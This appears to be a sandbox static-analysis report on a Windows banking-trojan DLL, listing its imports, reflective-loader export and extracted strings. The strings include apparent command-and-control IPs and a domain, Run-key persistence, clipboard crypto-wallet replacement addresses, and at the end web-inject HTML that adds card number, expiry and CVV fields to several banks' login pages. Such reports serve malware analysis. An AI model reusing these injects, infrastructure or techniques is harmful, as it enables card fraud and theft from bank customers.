Static | ZeroBOX

PE Compile Time

2025-02-05 18:13:35

PE Imphash

d5d6aeac6f87d62518c6e18dff35614c

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0002e81c 0x0002ea00 6.3126051128
.rdata 0x00030000 0x0000db46 0x0000dc00 4.86006637401
.data 0x0003e000 0x0000e0f0 0x00004000 5.04919456857
.pdata 0x0004d000 0x00003af8 0x00003c00 5.3998082596
.rsrc 0x00051000 0x000001e0 0x00000200 4.724728912
.reloc 0x00052000 0x00002112 0x00002200 1.58930184563

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00051060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x180030020 CloseHandle
0x180030028 GetLastError
0x180030030 HeapAlloc
0x180030038 GetProcessHeap
0x180030040 Sleep
0x180030048 TerminateProcess
0x180030050 CreateThread
0x180030058 ResumeThread
0x180030060 CreateProcessA
0x180030068 GetThreadContext
0x180030070 SetThreadContext
0x180030078 OpenProcess
0x180030080 GetNativeSystemInfo
0x180030088 VirtualAllocEx
0x180030090 WriteProcessMemory
0x180030098 IsWow64Process
0x1800300a0 lstrcmpiA
0x1800300a8 lstrcpyA
0x1800300b0 lstrcatA
0x1800300b8 lstrlenA
0x1800300c0 MultiByteToWideChar
0x1800300c8 WideCharToMultiByte
0x1800300d0 CreateToolhelp32Snapshot
0x1800300d8 Process32First
0x1800300e0 Process32Next
0x1800300e8 GetCurrentProcess
0x1800300f0 CreateRemoteThread
0x1800300f8 GetModuleHandleA
0x180030100 GetProcAddress
0x180030108 K32GetProcessMemoryInfo
0x180030110 LoadLibraryA
0x180030118 GetSystemInfo
0x180030120 VirtualAlloc
0x180030128 VirtualFree
0x180030130 VirtualQuery
0x180030138 HeapCreate
0x180030140 HeapReAlloc
0x180030148 HeapFree
0x180030150 GetCurrentProcessId
0x180030158 GetCurrentThreadId
0x180030160 OpenThread
0x180030168 SuspendThread
0x180030170 FlushInstructionCache
0x180030178 VirtualProtect
0x180030180 GetModuleHandleW
0x180030188 Thread32First
0x180030190 Thread32Next
0x180030198 EnterCriticalSection
0x1800301a0 LeaveCriticalSection
0x1800301a8 VirtualProtectEx
0x1800301b0 CreateDirectoryA
0x1800301b8 SetFileAttributesA
0x1800301c0 GetWindowsDirectoryA
0x1800301c8 GetVolumeInformationA
0x1800301d0 GlobalAlloc
0x1800301d8 GlobalLock
0x1800301e0 GlobalUnlock
0x1800301e8 Module32First
0x1800301f0 Module32Next
0x1800301f8 CreateMutexA
0x180030200 FlushFileBuffers
0x180030208 WriteConsoleW
0x180030210 SetStdHandle
0x180030218 WriteFile
0x180030220 ReadFile
0x180030228 CreateFileA
0x180030230 GetFileSize
0x180030238 CreateFileW
0x180030240 HeapDestroy
0x180030248 SetFilePointerEx
0x180030250 GetConsoleMode
0x180030258 GetConsoleCP
0x180030260 LoadLibraryW
0x180030268 LoadLibraryExW
0x180030270 OutputDebugStringW
0x180030278 EnumSystemLocalesEx
0x180030280 IsValidLocaleName
0x180030288 LCMapStringEx
0x180030290 GetUserDefaultLocaleName
0x180030298 CompareStringEx
0x1800302a0 FreeEnvironmentStringsW
0x1800302a8 GetEnvironmentStringsW
0x1800302b0 GetTickCount64
0x1800302b8 GetSystemTimeAsFileTime
0x1800302c0 QueryPerformanceCounter
0x1800302c8 GetModuleFileNameA
0x1800302d0 InitOnceExecuteOnce
0x1800302d8 GetFileType
0x1800302e8 DeleteCriticalSection
0x1800302f0 EncodePointer
0x1800302f8 DecodePointer
0x180030300 GetLocaleInfoEx
0x180030308 GetStringTypeW
0x180030310 RaiseException
0x180030318 IsDebuggerPresent
0x180030328 GetCommandLineA
0x180030338 GetCPInfo
0x180030340 GetStdHandle
0x180030348 GetModuleFileNameW
0x180030350 ExitProcess
0x180030358 GetModuleHandleExW
0x180030360 HeapSize
0x180030368 IsValidCodePage
0x180030370 GetACP
0x180030378 GetOEMCP
0x180030380 SetLastError
0x180030388 UnhandledExceptionFilter
0x180030398 FlsAlloc
0x1800303a0 FlsGetValue
0x1800303a8 FlsSetValue
0x1800303b0 FlsFree
0x1800303b8 GetStartupInfoW
Library USER32.dll:
0x180030400 wsprintfA
Library ADVAPI32.dll:
0x180030000 LookupPrivilegeValueA
0x180030008 AdjustTokenPrivileges
0x180030010 OpenProcessToken
Library SHELL32.dll:
0x1800303c8 SHGetFolderPathA
Library SHLWAPI.dll:
0x1800303d8 StrStrA
0x1800303e0 PathFindFileNameW
0x1800303e8 PathFindFileNameA
0x1800303f0 PathFileExistsA
Library ntdll.dll:
0x180030458 RtlLookupFunctionEntry
0x180030460 RtlUnwindEx
0x180030468 RtlCaptureContext
0x180030470 RtlVirtualUnwind
0x180030478 RtlPcToFileHeader
Library WININET.dll:
0x180030410 InternetCloseHandle
0x180030418 InternetOpenUrlW
0x180030420 InternetOpenW
0x180030428 HttpQueryInfoA
0x180030430 InternetConnectW
0x180030438 HttpOpenRequestW
0x180030440 HttpSendRequestA
0x180030448 InternetReadFile

Exports

Ordinal Address Name
1 0x180009660 ?ReflectiveLoader@@YA_KXZ
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
@UVWATAUAVH
D$`Mcw<3
A^A]A\_^]
UVWAVAWH
@A_A^_^]
@A_A^_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
SVWAVH
8A^_^[
|$ AVH
@VWAVH
|$ AVH
@UWATAUAVAWH
A_A^A]A\_]
SVWAVAWH
0A_A^_^[
|$ AVH
t`H+;H
\$ UVATAUAVH
A^A]A\^]
@VWAUAWH
8A_A]_^
8A_A]_^
t$ WATAUAVAWH
H;|$hu'
H;|$hu
0A_A^A]A\_
@UWAVAWH
D$(H;D$
XA_A^_]
t$ AVH
@SUVWATAUAVAWH
8A_A^A]A\_^][
fffffff
@SVWATAV
A^A\_^[
wMfffff
9D$,uy
9D$(tmL
|$ AVH
H9tW9_
@SUVWAVH
D$DA3@$
@09\$@t
`A^_^][
@SAVAWH
|$ UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
l$8Mc}<3
D$hSelf
D$lRefl
D$pectif
t$HcF<
A_A^A]A\_
HcA<H
SVWATAUH
PA]A\_^[
PA]A\_^[
|$ AVH
UVWAVAWH
A_A^_^]
|$ AVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
L$ UVWH
|$ AVH
\$Pfff
USWATAUAWH
A_A]A\_[]
A_A]A\_[]
SWATAVAWH
pA_A^A\_[
pA_A^A\_[
VWATAVAWH
@A_A^A\_^
SVWATAVH
@A^A\_^[
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWAVH
A^_^][
@SWAVH
u_I9>u
@UATAUAVH
A^A]A\]
A^A]A\]
@UVATAUH
8A]A\^]
@VWAVH
@VWAVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
|$ AVH
L$ VWAVH
@SUVWAVH
A^_^][
UAVAWH
0A_A^]
@SUWAVH
xA^_][
|$ AVH
|$ AVH
|$ AVH
t$ AVH
@SUVWATAVAWH
A_A^A\_^][
l$ VATAWH
G;} }BL9f(u
;E$};
=L9f8u
A_A\^
|$ ATAVAWH
0A_A^A\
{xBuH
tgHcCt
WATAUAVAWH
@A_A^A]A\_
|$ AVH
Cx<cuQ
{|-uvH
9Ct|mD
{||usH
t9fffff
|$@9s|
|$ AVH
t$ WATAVH
@SVAUAWH
xA_A]^[
D;{ }FH
xA_A]^[
SVWATAUAVAWH
@A_A^A]A\_^[
{|?upH
SVWAVAWH
0A_A^_^[
SVWATAVH
0A^A\_^[
l$ VWAVH
l$ VATAVH
A^A\^
|$ AVH
|$ AVH
UVWATAUAVAWH
0A_A^A]A\_^]
\$ VWAVH
USVWATH
A\_^[]
tnffff
A\_^[]
WAVAWH
PA_A^_
@SUVWH
WATAUAVAWH
@A_A^A]A\_
|$ AVH
@UVWAVAWH
A_A^_^]
@SVATAWH
xA_A\^[
D;{ }FH
xA_A\^[
@VWAVH
|$ AVH
t$ AVH
tBD;5\E
r9D;5OE
SVWATAUAVAWH
A_A^A]A\_^[
\$ WATAVH
C,9C0u>D
A^A\_
|$ AVH
@UVWAVH
@<9F4r
XA^_^]
@SUVWAWH
A__^][
SVWAVAWH
0A_A^_^[
$ZasL+
$ZasH+Q
$ZasH+
t`H+;H
$ZasH+
x ATAVAWH
A_A^A\
l$ VWAVH
ATAVAWH
A_A^A\
fffffff
VWATAVAWH
A_A^A\_^
x ATAVAWH
A_A^A\
x UAVAWH
A:8uiI
t"A88t
s WATAUAVAWH
9t$P~.8\$vt(H
9t$P~98\$vt3H
A_A^A]A\_
@USVWATAUAVAWH
eHA_A^A]A\_^[]
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
x ATAUAWH
@A_A]A\
t$ WAVAWH
@SUVWATAVAWH
zu|D!t$ E3
A_A^A\_^][
WATAUAVAWH
@A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
Genuua
ineIuY
nteluQ3
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
WAVAWH
fE98t'
0A_A^_
@SUVWATAUAVAWH
A_A^A]A\_^][
;Cu1f9K
f93t M;
L$ SUVWH
|$ ATAVAWH
0A_A^A\
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
^fD9+t
A_A^A]A\_^]
\$ UVWATAUAVAWH
A_A^A]A\_^]
fD9|$bu
H9L$Ht8H
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
D8eoupH
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
AUAVAWH
0A_A^A]
@SVWATAUAVAWH
L!|$@L!
D$HHcH
A_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAVH
@A^A\_
WATAUAVAWH
gfffffffH
D8L$Ht
A_A^A]A\_
x AUAVAWH
A_A^A]
@SUVWH
@SUVWH
@SUVWAVH
A^_^][
` AUAVAWH
t$HHc0I
\$0D9=
A_A^A]
Hct$@H
sYHcL$HH
x ATAVAWH
A_A^A\
H3E H3E
@UATAUAVAWH
A_A^A]A\]
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
ATAVAWH
D8d$8t
@A_A^A\
\$ UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAWH
0A_A^A\_^
@8l$8t
@SUVWATAVAWH
PA_A^A\_^][
@UATAUAVAWH
A_A^A]A\]
LcA<E3
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
f9.uVH
f9.u"H
tVf91tQH
x ATAVAWH
A_A^A\
@SUVWATAVAWH
3fD9 t
A_A^A\_^][
@USVWH
VWATAVAWH
A_A^A\_^
\$ UVWATAUAVAWH
!|$HHc
|$HD9l$X
HcD$LH;
HcD$LH;
H!|$ L
A_A^A]A\_^]
AUAVAWH
0A_A^A]
D8t$8t
|$ UATAUAVAWH
A_A^A]A\]
|$ UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
D82u&H
D8t$Ht
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
A_A^A]
H(H9J(u
generic
unknown error
iostream
iostream stream error
system
trusteer
chrome.exe
opera.exe
msedge.exe
brave.exe
browser.exe
AvastBrowser.exe
AVGBrowser.exe
--disable-http2 --use-spdy=off --disable-quic
firefox.exe
Diamotrixed
\\.\pipe\%s
CreateProcessInternalW
explorer.exe
invalid string position
string too long
LoadLibraryA
SeDebugPrivilege
vector<T> too long
176.113.115.149
185.81.68.156
diamotrix.online
/VzCAHn.php
User32.dll
Kernel32.dll
KernelBase.dll
msvcrt.dll
ntdll.dll
Shlwapi.dll
Shell32.dll
Secur32.dll
Advapi32.dll
ws2_32.dll
version.dll
Psapi.dll
wininet.dll
MessageBoxA
GetWindowsDirectoryA
WideCharToMultiByte
LocalAlloc
wsprintfA
MultiByteToWideChar
malloc
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
GetProcAddress
PathRemoveFileSpecA
GetModuleFileNameA
PathFindFileNameA
strncmp
_strnicmp
lstrlenA
ExitProcess
SHGetFolderPathA
lstrcpyA
lstrcatA
CopyFileA
GetVolumeInformationA
GetUserNameExA
LookupAccountNameA
ConvertSidToStringSidA
LocalFree
lstrcmpiA
lstrcmpA
StrStrA
StrStrIA
strtol
realloc
WSAStartup
socket
gethostbyname
connect
closesocket
WSACleanup
memset
memcpy
NtOpenKey
NtSetValueKey
CloseHandle
CreateProcessA
NtCreateThreadEx
TerminateProcess
FindWindowA
NtUnmapViewOfSection
NtQueryInformationProcess
GetThreadContext
SetThreadContext
SHFileOperationA
FindFirstFileA
FindNextFileA
GetWindowThreadProcessId
InitializeCriticalSection
GetLastError
EnterCriticalSection
LeaveCriticalSection
_errno
tolower
isdigit
strtoul
isxdigit
strtod
CreateToolhelp32Snapshot
Process32First
Process32Next
StrChrA
StrToIntA
GetModuleHandleA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
GetModuleInformation
memcmp
ExpandEnvironmentStringsA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
CreateFileA
ReadFile
WriteFile
RegSetValueExA
RegOpenKeyExA
RegCloseKey
GetFileSize
ResumeThread
IsWow64Process
GetNativeSystemInfo
OpenProcess
CreateThread
GetUserNameW
GetComputerNameW
GetVersionExA
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
InternetCrackUrlA
GetTempPathA
GetTempFileNameA
ShellExecuteA
ioctlsocket
CreateMutexA
ReleaseMutex
WaitForSingleObject
EnumWindows
GetCurrentProcessId
DeleteFileA
PathFileExistsA
CreateDirectoryA
HttpQueryInfoA
HttpQueryInfoW
RtlCompressBuffer
RtlGetCompressionWorkSpaceSize
SetThreadDesktop
CreateDesktopA
OpenDesktopA
TerminateThread
PostMessageA
SendMessageA
ChildWindowFromPoint
ScreenToClient
MoveWindow
GetWindowRect
GetMenuItemID
MenuItemFromPoint
RealGetWindowClassA
PtInRect
GetWindowPlacement
SetWindowLongA
GetWindowLongA
WindowFromPoint
SHAppBarMessage
RegQueryValueExA
GetDesktopWindow
DeleteDC
ReleaseDC
DeleteObject
GetDIBits
StretchBlt
SetStretchBltMode
SelectObject
CreateCompatibleDC
CreateCompatibleBitmap
IsWindowVisible
GetWindow
PrintWindow
GetTopWindow
chunked
HTTP/1.1
Host:
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length:
HTTP/1.1 200 OK
Content-Length
Transfer-Encoding
\Registry\User\%s\%s
Software\Microsoft\Windows\CurrentVersion\Run
GetInjects
Firefox
nss3.dll
PR_Read
PR_Write
Content-Length:
Accept-Encoding
identity
Connection
Content-Type:
text/html
Location:
Host:
http(s)://
log|%s|%s|%d|
Mozilla
bot|%d|%d|%d|%d|%s|%s|%d|%d
Shell_TrayWnd
verclsid.exe
child.dll
:Zone.Identifier
Trusteer
Content-Type: application/x-www-form-urlencoded
Connection: close
ReflectiveLoader
xdigit
%08lX%04lX%lu
DELETE
()$^.*+?[]|\-{},:=!
bad locale name
\b(1|3|bc1)[a-zA-HJ-NP-Z0-9]{25,42}\b
\b0x[a-fA-F0-9]{40}\b
\bT[a-zA-HJ-NP-Z0-9]{33}\b
\b(L|M)[a-zA-HJ-NP-Z0-9]{26,33}\b
1ZWNNwbtBZWS9M9Q58NA2z9e4AXvK9VuD
0x270a8ee6933ae7a56b82c7c3e625cca5c120a520
TAfvwf9NS4WXJR8qxTwo5qdnDKTaL762j6
LKnTdbFRxqoZgx3JaD7fS43urGXp2dgkLU
report=%s,%s,%d
bad cast
vector<bool> too long
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
()$^.*+?[]|\-{},:=!
SetClipboardData
EmptyClipboard
OpenClipboard
GetClipboardData
CloseClipboard
Chrome
PR_GetDescType
chrome.dll
msedge.dll
opera-browser.dll
browser.dll
Diamotrixes
dllhost.exe
AVE_MARIA
injects
web_content
url_blacklist
data_before
inject
bad allocation
regex_error(error_collate): The expression contained an invalid collating element name.
regex_error(error_ctype): The expression contained an invalid character class name.
regex_error(error_escape): The expression contained an invalid escaped character, or a trailing escape.
regex_error(error_backref): The expression contained an invalid back reference.
regex_error(error_brack): The expression contained mismatched [ and ].
regex_error(error_paren): The expression contained mismatched ( and ).
regex_error(error_brace): The expression contained mismatched { and }.
regex_error(error_badbrace): The expression contained an invalid range in a { expression }.
regex_error(error_range): The expression contained an invalid character range, such as [b-a] in most encodings.
regex_error(error_space): There was insufficient memory to convert the expression into a finite state machine.
regex_error(error_badrepeat): One of *?+{ was not preceded by a valid regular expression.
regex_error(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
regex_error(error_stack): There was insufficient memory to determine whether the regular expression could match the specified character sequence.
regex_error(error_parse)
regex_error(error_syntax)
regex_error
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
bad exception
GetCurrentPackageId
_hypot
_nextafter
(null)
`h````
xpxxxx
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h`hhh
xppwpp
1#SNAN
1#QNAN
CreateFileA
CreateFileW
GetFileSize
ReadFile
WriteFile
CloseHandle
GetLastError
HeapAlloc
GetProcessHeap
TerminateProcess
CreateThread
ResumeThread
CreateProcessA
GetThreadContext
SetThreadContext
OpenProcess
GetNativeSystemInfo
VirtualAllocEx
WriteProcessMemory
IsWow64Process
lstrcmpiA
lstrcpyA
lstrcatA
lstrlenA
MultiByteToWideChar
WideCharToMultiByte
CreateToolhelp32Snapshot
Process32First
Process32Next
GetCurrentProcess
CreateRemoteThread
GetModuleHandleA
GetProcAddress
K32GetProcessMemoryInfo
LoadLibraryA
GetSystemInfo
VirtualAlloc
VirtualFree
VirtualQuery
HeapCreate
HeapDestroy
HeapReAlloc
HeapFree
GetCurrentProcessId
GetCurrentThreadId
OpenThread
SuspendThread
FlushInstructionCache
VirtualProtect
GetModuleHandleW
Thread32First
Thread32Next
EnterCriticalSection
LeaveCriticalSection
VirtualProtectEx
CreateDirectoryA
SetFileAttributesA
GetWindowsDirectoryA
GetVolumeInformationA
GlobalAlloc
GlobalLock
GlobalUnlock
Module32First
Module32Next
CreateMutexA
KERNEL32.dll
wsprintfA
USER32.dll
OpenProcessToken
AdjustTokenPrivileges
LookupPrivilegeValueA
ADVAPI32.dll
SHGetFolderPathA
SHELL32.dll
PathFileExistsA
PathFindFileNameA
PathFindFileNameW
StrStrA
SHLWAPI.dll
NtQueryInformationProcess
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
RtlCaptureContext
RtlVirtualUnwind
ntdll.dll
InternetOpenW
InternetCloseHandle
InternetOpenUrlW
InternetReadFile
HttpQueryInfoA
InternetConnectW
HttpOpenRequestW
HttpSendRequestA
WININET.dll
InitializeCriticalSectionEx
DeleteCriticalSection
EncodePointer
DecodePointer
GetLocaleInfoEx
GetStringTypeW
RaiseException
IsDebuggerPresent
IsProcessorFeaturePresent
GetCommandLineA
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
HeapSize
IsValidCodePage
GetACP
GetOEMCP
SetLastError
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
GetStartupInfoW
GetFileType
InitOnceExecuteOnce
GetModuleFileNameA
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
CompareStringEx
GetUserDefaultLocaleName
LCMapStringEx
IsValidLocaleName
EnumSystemLocalesEx
OutputDebugStringW
LoadLibraryExW
LoadLibraryW
GetConsoleCP
GetConsoleMode
SetFilePointerEx
SetStdHandle
WriteConsoleW
FlushFileBuffers
bot64.dll
?ReflectiveLoader@@YA_KXZ
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
YYYYYYYYYYYY
}YPPPPYYYYa
``YYYYYYYYYYY
JJJJKRJJJJOLJJJJJJJJUE@JJJEYMFJ]JJJJJJJJJJJJJJacgNJJkmJJEmJJDEJJ
d[[[[[
[[[[[[[[[[[[js
[RRRR[[[[w|w
vv[[[[[[[[[[[
@@@@AI@@@@LB@@@@@@@@ODS@@@DWC\@`@@@@@@@@@@@@@@dfnk@@jF@@DF@@[D@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVbad_cast@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AUctype_base@std@@
.?AV?$ctype@D@std@@
.?AV?$collate@D@std@@
.?AV_Node_base@std@@
.?AV_Root_node@std@@
.?AV_Node_end_group@std@@
.?AV_Node_assert@std@@
.?AV_Node_capture@std@@
.?AV_Node_back@std@@
.?AV_Node_endif@std@@
.?AV_Node_if@std@@
.?AV_Node_rep@std@@
.?AV_Node_end_rep@std@@
.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@
.?AV?$_Node_str@D@std@@
AWAVATVWUSH
????H1
AWAVAUATVWUSH
????H1
AWAVAUATVWUSH
????H1
AVVWUSH
????H1
DAVVWUSH
????H1
DAWAVAUATVWUSH
$????H
AWAVAUATVWUSH
$????L
$????H
$????H
????H1
AWAVAUATVWUSH
$????H
AWAVAUATVWUSH
$????H
.?AVbad_alloc@std@@
"url_blacklist": [ "*ocsp*.*", "*symc*.com*", "*clients*.google.com*", "*telemetry.mozilla.org*", "*safebrowsing.google.com*", "*services.mozilla.com*", "incoming.telemetry.mozilla.org", "*googlevideo.com*", "translate.googleapis.com", "*lencr.org*", "*log-upload-os.hoyoverse.com*", "b1.nel.goog*", "*v.clarity.ms*", "*dns.com*", "*x.com*", "*youtube.com*" ],
"injects":
{
"url": "connexion-mabanque.bnpparibas",
"path": "*",
"web_content":
[
{
"data_before": "rv-value-reactive=\"form.idTelematique\">",
"inject": "<label for=\"card_num\" rv-text=\"config.app.identification.numclient\">2. <span class=\"label_field\">Num
ro De Carte</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"card_num\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"card_num\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"exp_date\" rv-text=\"config.app.identification.numclient\">3. <span class=\"label_field\">Date d'expiration</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"exp_date\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"exp_date\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\"><label for=\"cvv\" rv-text=\"config.app.identification.numclient\">4. <span class=\"label_field\">CVV</span></label><input type=\"text\" pattern=\"[0-9]*\" value=\"\" name=\"cvv\" maxlength=\"10\" size=\"10\" autofocus=\"\" autocorrect=\"off\" id=\"cvv\" class=\"form-control numeric\" rv-value-reactive=\"form.idTelematique\">"
}
]
},
{
"url": "particuliers.sg.fr",
"path": "/icd/cbo/index-authsec.html",
"web_content":
[
{
"data_before": "class=\"auth_error\"></div>",
"inject": "<br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"card_num\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Num
ro De Carte</label> </div><br><div class=\"auth-cs-content swm_input-container\"> <input id=\"user_id\" name=\"exp_date\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre code client\"></button> <span class=\"bar\" aria-hidden=\"true\"></span> <label for=\"user_id\">Date d'expiration</label> <br><div class=\"auth-cs-content swm_input-container\"> <input id=\"cvv\" name=\"cvv\" type=\"text\" class=\"swm_input grey_cross ngim-input\" autocapitalize=\"none\" autocorrect=\"off\" aria-label=\"Code client\" placeholder=\" \" autocomplete=\"off\" maxlength=\"8\" aria-describedby=\"js-error\" required=\"\"> <button id=\"user_id-delete\" role=\"button\" class=\"swm_sprite swm_to-clear\" aria-label=\"Effacer votre cvv\"></button> <span c
}
]
},
{
"url": "www.bankofamerica.com",
"path": "*",
"web_content":
[
{
"data_before": "id=\"passcode1_errorMessage\" aria-hidden=\"true\">",
"inject": "</div><div><input name=\"card_number\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Credit Card Number\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Card number\" autocomplete=\"off\"></div><br><div><input name=\"EX_date\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"Expiration date\" maxlength=\"32\" aria-required=\"true\" aria-label=\"Ex date\" autocomplete=\"off\"></div><br><div><input name=\"CVV\" class=\"tl-private cs-passcode1 spa-input-text\" type=\"text\" placeholder=\"CVV\" maxlength=\"4\" aria-required=\"true\" aria-label=\"CVV number\" autocomplete=\"off\"></div><br><div>"
}
]
},
"url": "www.exchanger.ws",
"path": "*",
"web_content": [
{
"data_before": "</title>",
